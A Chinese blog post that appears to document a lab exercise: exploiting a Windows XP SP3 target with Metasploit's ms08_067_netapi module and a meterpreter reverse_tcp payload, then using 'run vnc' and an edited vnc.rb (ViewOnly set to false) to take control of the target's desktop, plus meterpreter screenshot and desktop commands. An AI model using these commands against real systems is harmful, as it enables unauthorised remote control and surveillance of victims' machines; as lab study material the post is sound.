Metasploit利用vnc图形化远程控制工具获得靶机远程控制桌面

    技术2022-07-11  84

    问题描述

      分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。   由于笔者没有配置Linux虚拟机,因此使用Windows XP SP3中文版作为靶机,并使用ms08_067作为渗透模块进行渗透。

    解决办法

    在msfconsole中使用命令:

    use exploit/windows/smb/ms08_067_netapi set PAYLOAD windows/meterpreter/reverse_tcp set RHOST 192.168.161.130 set LHOST 192.168.161.128 set TARGET 34 exploit

    得到会话后使用命令run vnc获得靶机桌面。结果如下:

    如何控制

      由于使用已经封装好的vnc只能进行靶机桌面的监控,并不能完成对靶机桌面的控制,因此想要完成对靶机的控制,需要对vnc.rb文件进行修改。   在目录/usr/share/metasploit-framework/scripts/meterpreter/下找到vnc.rb文件,如下:

    在该文件中找到pay的声明位置,在其后添加pay.datastore['ViewOnly'] = false后即可对远程桌面进行控制。

    一些关于远程桌面的命令

    enumdesktops   #查看可用的桌面 getdesktop   #获取当前 meterpreter 关联的桌面 set_desktop   #设置 meterpreter 关联的桌面 h 查看帮助 screenshot   #截屏 use espia   #或者使用 espia 模块截屏 然后输入 screengrab run vnc   #使用使用vnc远程桌面连接

    参考资料

    Meterpreter run vnc 遇到的问题 metasploit 目录结构

    Processed: 0.010, SQL: 9